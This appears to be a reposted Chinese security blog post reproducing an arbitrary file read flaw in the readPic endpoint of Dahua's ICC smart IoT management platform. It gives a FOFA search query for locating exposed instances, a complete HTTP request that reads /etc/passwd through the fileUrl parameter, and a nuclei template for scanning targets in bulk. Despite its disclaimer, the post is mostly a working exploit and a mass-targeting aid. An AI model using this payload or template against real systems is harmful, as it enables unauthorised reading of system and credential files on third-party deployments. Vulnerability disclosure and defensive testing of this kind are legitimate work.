【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞

admin 2024年2月15日17:33:18评论49 views字数 1475阅读4分55秒阅读模式

大家可以把蚁剑安全实验室设为星标”,这样就可以及时看到我们最新发布的“漏洞预警”及“漏洞复现”的安全内容啦!

【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞

免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

一、漏洞描述

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台的 "readpic" 接口存在一个任意文件读取漏洞,恶意攻击者可通过文件读取漏洞进行访问和读取系统中的文件,包括配置文件、日志和其他敏感数据,从而利用攻击。

二、漏洞复现

1、fofa语法查找:body="*客户端会小于800*"

【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞2、登录页面如下:【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞

3、使用下述POC进行复

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1If-None-Match: W/"63ba2750-93e"Te: trailers

4、访问系统抓包进行拦截数据包,修改请求包,使用POC进行漏洞测试,响应包中则会返回敏感数据【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞

5、批量漏洞测试脚本

nuclei:

id: dahua-icc-readpic-anyfilereadinfo:  name: 大华ICC readpic任意文件读取漏洞  author: fgz  severity: high  description: |    2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。  tags: 2023,dahua,fileread  metadata:    max-request: 2    fofa-query: body="*客户端会小于800*"    verified: truehttp:  - method: GET    path:      - "{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd"    matchers:      - type: regex        part: body        regex:          - "root:.*?:[0-9]*:[0-9]*:"

原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日17:33:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞https://cn-sec.com/archives/2187864.html

发表评论

匿名网友 填写信息